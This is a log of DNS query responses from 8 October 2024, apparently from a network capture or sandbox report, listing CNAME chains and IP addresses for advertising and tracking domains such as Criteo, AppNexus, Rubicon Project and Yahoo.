                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.330209017 CEST1.1.1.1192.168.2.40x6bdfNo error (0)ap.lijit.comvap.lijit.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.330209017 CEST1.1.1.1192.168.2.40x6bdfNo error (0)vap.lijit.comemeas.vap.lijit.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.330209017 CEST1.1.1.1192.168.2.40x6bdfNo error (0)emeas.vap.lijit.comeu.vap.lijit.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.330209017 CEST1.1.1.1192.168.2.40x6bdfNo error (0)eu.vap.lijit.comblackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.330404997 CEST1.1.1.1192.168.2.40x4873No error (0)ap.lijit.comvap.lijit.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.330404997 CEST1.1.1.1192.168.2.40x4873No error (0)vap.lijit.comemeas.vap.lijit.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.330404997 CEST1.1.1.1192.168.2.40x4873No error (0)emeas.vap.lijit.comeu.vap.lijit.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.330404997 CEST1.1.1.1192.168.2.40x4873No error (0)eu.vap.lijit.comblackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.330404997 CEST1.1.1.1192.168.2.40x4873No error (0)blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com54.216.254.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.330404997 CEST1.1.1.1192.168.2.40x4873No error (0)blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com54.194.113.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.330404997 CEST1.1.1.1192.168.2.40x4873No error (0)blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com52.18.99.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.330404997 CEST1.1.1.1192.168.2.40x4873No error (0)blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com52.210.21.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.330404997 CEST1.1.1.1192.168.2.40x4873No error (0)blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com52.51.204.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.330404997 CEST1.1.1.1192.168.2.40x4873No error (0)blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com52.214.241.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.330404997 CEST1.1.1.1192.168.2.40x4873No error (0)blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com99.80.48.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.330404997 CEST1.1.1.1192.168.2.40x4873No error (0)blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com54.73.192.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.760411978 CEST1.1.1.1192.168.2.40x882bNo error (0)ssp-sync.criteo.comssp-sync.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.760425091 CEST1.1.1.1192.168.2.40x5e58No error (0)ssp-sync.criteo.comssp-sync.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.760425091 CEST1.1.1.1192.168.2.40x5e58No error (0)ssp-sync.nl3.vip.prod.criteo.com178.250.1.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.772861958 CEST1.1.1.1192.168.2.40x287aNo error (0)ib.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.772861958 CEST1.1.1.1192.168.2.40x287aNo error (0)ib.anycast.adnxs.com185.89.210.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.772861958 CEST1.1.1.1192.168.2.40x287aNo error (0)ib.anycast.adnxs.com185.89.211.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.772861958 CEST1.1.1.1192.168.2.40x287aNo error (0)ib.anycast.adnxs.com185.89.210.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.772861958 CEST1.1.1.1192.168.2.40x287aNo error (0)ib.anycast.adnxs.com185.89.210.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.772861958 CEST1.1.1.1192.168.2.40x287aNo error (0)ib.anycast.adnxs.com185.89.210.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.772861958 CEST1.1.1.1192.168.2.40x287aNo error (0)ib.anycast.adnxs.com185.89.210.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.772861958 CEST1.1.1.1192.168.2.40x287aNo error (0)ib.anycast.adnxs.com185.89.211.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.772861958 CEST1.1.1.1192.168.2.40x287aNo error (0)ib.anycast.adnxs.com185.89.210.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.772861958 CEST1.1.1.1192.168.2.40x287aNo error (0)ib.anycast.adnxs.com185.89.210.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.772861958 CEST1.1.1.1192.168.2.40x287aNo error (0)ib.anycast.adnxs.com185.89.210.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.772861958 CEST1.1.1.1192.168.2.40x287aNo error (0)ib.anycast.adnxs.com185.89.210.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.772861958 CEST1.1.1.1192.168.2.40x287aNo error (0)ib.anycast.adnxs.com185.89.210.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.798116922 CEST1.1.1.1192.168.2.40x1d4bNo error (0)pixel-eu.rubiconproject.compixel-eu.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.799417019 CEST1.1.1.1192.168.2.40x12deNo error (0)pixel-eu.rubiconproject.compixel-eu.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.843003035 CEST1.1.1.1192.168.2.40x1a55No error (0)sync.ipredictive.com54.160.189.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.843003035 CEST1.1.1.1192.168.2.40x1a55No error (0)sync.ipredictive.com52.73.131.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.843003035 CEST1.1.1.1192.168.2.40x1a55No error (0)sync.ipredictive.com54.156.4.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.843003035 CEST1.1.1.1192.168.2.40x1a55No error (0)sync.ipredictive.com52.72.27.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.843003035 CEST1.1.1.1192.168.2.40x1a55No error (0)sync.ipredictive.com52.87.52.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.843003035 CEST1.1.1.1192.168.2.40x1a55No error (0)sync.ipredictive.com54.160.43.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.843003035 CEST1.1.1.1192.168.2.40x1a55No error (0)sync.ipredictive.com54.159.226.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.843003035 CEST1.1.1.1192.168.2.40x1a55No error (0)sync.ipredictive.com54.156.110.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.845138073 CEST1.1.1.1192.168.2.40x6b3cNo error (0)dis.criteo.comwidget.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.845151901 CEST1.1.1.1192.168.2.40x35aaNo error (0)dis.criteo.comwidget.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.845151901 CEST1.1.1.1192.168.2.40x35aaNo error (0)widget.nl3.vip.prod.criteo.com178.250.1.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.931176901 CEST1.1.1.1192.168.2.40x2e50No error (0)hbx.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.931581974 CEST1.1.1.1192.168.2.40x3b0cNo error (0)gum.criteo.comgum.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.931845903 CEST1.1.1.1192.168.2.40xfd67No error (0)gum.criteo.comgum.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.931845903 CEST1.1.1.1192.168.2.40xfd67No error (0)gum.nl3.vip.prod.criteo.com178.250.1.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.961009979 CEST1.1.1.1192.168.2.40x98ecNo error (0)secure-assets.rubiconproject.comdigicertwc.rubiconproject.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.961146116 CEST1.1.1.1192.168.2.40x4c47No error (0)secure-assets.rubiconproject.comdigicertwc.rubiconproject.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.971293926 CEST1.1.1.1192.168.2.40x9a21No error (0)p.rfihub.coma.rfihub.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.971293926 CEST1.1.1.1192.168.2.40x9a21No error (0)a.rfihub.coma.rfihub.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.971307993 CEST1.1.1.1192.168.2.40x7a40No error (0)p.rfihub.coma.rfihub.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.971307993 CEST1.1.1.1192.168.2.40x7a40No error (0)a.rfihub.coma.rfihub.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.021836996 CEST1.1.1.1192.168.2.40xbe2eNo error (0)tsdtocl.com151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.021836996 CEST1.1.1.1192.168.2.40xbe2eNo error (0)tsdtocl.com151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.021836996 CEST1.1.1.1192.168.2.40xbe2eNo error (0)tsdtocl.com151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.021836996 CEST1.1.1.1192.168.2.40xbe2eNo error (0)tsdtocl.com151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.473253012 CEST1.1.1.1192.168.2.40x40b5No error (0)sync-tm.everesttech.netsync.tubemogul.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.473253012 CEST1.1.1.1192.168.2.40x40b5No error (0)sync.tubemogul.comsyncf.tubemogul.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.473253012 CEST1.1.1.1192.168.2.40x40b5No error (0)syncf.tubemogul.comh2.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.474116087 CEST1.1.1.1192.168.2.40x8d12No error (0)sync-tm.everesttech.netsync.tubemogul.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.474116087 CEST1.1.1.1192.168.2.40x8d12No error (0)sync.tubemogul.comsyncf.tubemogul.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.474116087 CEST1.1.1.1192.168.2.40x8d12No error (0)syncf.tubemogul.comh2.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.474179029 CEST1.1.1.1192.168.2.40x31a1No error (0)guce.yahoo.comreal.rotation.guce.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.474179029 CEST1.1.1.1192.168.2.40x31a1No error (0)real.rotation.guce.aws.oath.cloudprod-rotation-v2.guce.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.474256039 CEST1.1.1.1192.168.2.40x96c7No error (0)guce.yahoo.comreal.rotation.guce.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.474256039 CEST1.1.1.1192.168.2.40x96c7No error (0)real.rotation.guce.aws.oath.cloudprod-rotation-v2.guce.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.474256039 CEST1.1.1.1192.168.2.40x96c7No error (0)prod-rotation-v2.guce.aws.oath.cloud52.208.147.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.474256039 CEST1.1.1.1192.168.2.40x96c7No error (0)prod-rotation-v2.guce.aws.oath.cloud34.240.205.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.474256039 CEST1.1.1.1192.168.2.40x96c7No error (0)prod-rotation-v2.guce.aws.oath.cloud34.249.71.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.474270105 CEST1.1.1.1192.168.2.40xbef2No error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.474282980 CEST1.1.1.1192.168.2.40x1848No error (0)sync-tm.everesttech.netsync.tubemogul.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.474282980 CEST1.1.1.1192.168.2.40x1848No error (0)sync.tubemogul.comsyncf.tubemogul.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.474282980 CEST1.1.1.1192.168.2.40x1848No error (0)syncf.tubemogul.comh2.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.475080967 CEST1.1.1.1192.168.2.40x1d99No error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.475080967 CEST1.1.1.1192.168.2.40x1d99No error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.475255013 CEST1.1.1.1192.168.2.40x6fe1No error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.475255013 CEST1.1.1.1192.168.2.40x6fe1No error (0)user-data-eu.bidswitch.net35.214.136.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.475270033 CEST1.1.1.1192.168.2.40x8b45No error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.475270033 CEST1.1.1.1192.168.2.40x8b45No error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.476366997 CEST1.1.1.1192.168.2.40xcde7No error (0)sync-tm.everesttech.netsync.tubemogul.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.476366997 CEST1.1.1.1192.168.2.40xcde7No error (0)sync.tubemogul.comsyncf.tubemogul.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.476366997 CEST1.1.1.1192.168.2.40xcde7No error (0)syncf.tubemogul.comh2.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.476378918 CEST1.1.1.1192.168.2.40x1572No error (0)query1.finance.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.476378918 CEST1.1.1.1192.168.2.40x1572No error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.476378918 CEST1.1.1.1192.168.2.40x1572No error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.476452112 CEST1.1.1.1192.168.2.40x14b8No error (0)query1.finance.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.478657961 CEST1.1.1.1192.168.2.40xa85cNo error (0)guce.yahoo.comreal.rotation.guce.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.478657961 CEST1.1.1.1192.168.2.40xa85cNo error (0)real.rotation.guce.aws.oath.cloudprod-rotation-v2.guce.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.479379892 CEST1.1.1.1192.168.2.40x248cNo error (0)guce.yahoo.comreal.rotation.guce.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.479379892 CEST1.1.1.1192.168.2.40x248cNo error (0)real.rotation.guce.aws.oath.cloudprod-rotation-v2.guce.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.479379892 CEST1.1.1.1192.168.2.40x248cNo error (0)prod-rotation-v2.guce.aws.oath.cloud52.208.147.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.479379892 CEST1.1.1.1192.168.2.40x248cNo error (0)prod-rotation-v2.guce.aws.oath.cloud34.240.205.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:28.479379892 CEST1.1.1.1192.168.2.40x248cNo error (0)prod-rotation-v2.guce.aws.oath.cloud34.249.71.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.109783888 CEST1.1.1.1192.168.2.40xdb00No error (0)widget.us.criteo.comwidget.us5.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.109783888 CEST1.1.1.1192.168.2.40xdb00No error (0)widget.us5.vip.prod.criteo.com74.119.117.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.109903097 CEST1.1.1.1192.168.2.40xf897No error (0)widget.us.criteo.comwidget.us5.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.123174906 CEST1.1.1.1192.168.2.40x6d88No error (0)sync.a-mo.netnld-prebid.a-mx.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.123174906 CEST1.1.1.1192.168.2.40x6d88No error (0)nld-prebid.a-mx.net163.5.194.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.123174906 CEST1.1.1.1192.168.2.40x6d88No error (0)nld-prebid.a-mx.net163.5.194.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.123174906 CEST1.1.1.1192.168.2.40x6d88No error (0)nld-prebid.a-mx.net163.5.194.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.123174906 CEST1.1.1.1192.168.2.40x6d88No error (0)nld-prebid.a-mx.net163.5.194.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.123174906 CEST1.1.1.1192.168.2.40x6d88No error (0)nld-prebid.a-mx.net163.5.194.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.123174906 CEST1.1.1.1192.168.2.40x6d88No error (0)nld-prebid.a-mx.net163.5.194.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.123174906 CEST1.1.1.1192.168.2.40x6d88No error (0)nld-prebid.a-mx.net163.5.194.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.123174906 CEST1.1.1.1192.168.2.40x6d88No error (0)nld-prebid.a-mx.net163.5.194.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.123501062 CEST1.1.1.1192.168.2.40x8e7cNo error (0)sync.a-mo.netnld-prebid.a-mx.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.135055065 CEST1.1.1.1192.168.2.40xcf0eNo error (0)s.amazon-adsystem.com98.82.154.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.185442924 CEST1.1.1.1192.168.2.40x8f08No error (0)token.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.185476065 CEST1.1.1.1192.168.2.40xdebbNo error (0)ib.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.185476065 CEST1.1.1.1192.168.2.40xdebbNo error (0)ib.anycast.adnxs.com37.252.173.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.185476065 CEST1.1.1.1192.168.2.40xdebbNo error (0)ib.anycast.adnxs.com37.252.171.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.185476065 CEST1.1.1.1192.168.2.40xdebbNo error (0)ib.anycast.adnxs.com37.252.171.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.185476065 CEST1.1.1.1192.168.2.40xdebbNo error (0)ib.anycast.adnxs.com37.252.171.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.185476065 CEST1.1.1.1192.168.2.40xdebbNo error (0)ib.anycast.adnxs.com37.252.172.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.185476065 CEST1.1.1.1192.168.2.40xdebbNo error (0)ib.anycast.adnxs.com37.252.171.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.185476065 CEST1.1.1.1192.168.2.40xdebbNo error (0)ib.anycast.adnxs.com37.252.171.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.187056065 CEST1.1.1.1192.168.2.40x4299No error (0)token.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.206732035 CEST1.1.1.1192.168.2.40x556aNo error (0)sync.1rx.io46.228.174.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.207701921 CEST1.1.1.1192.168.2.40x3331No error (0)pixel.tapad.com34.111.113.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.211548090 CEST1.1.1.1192.168.2.40x33f3No error (0)match.prod.bidr.io46.137.57.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.211548090 CEST1.1.1.1192.168.2.40x33f3No error (0)match.prod.bidr.io52.210.235.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.211548090 CEST1.1.1.1192.168.2.40x33f3No error (0)match.prod.bidr.io34.253.109.63A (IP address)IN (0x0001)false
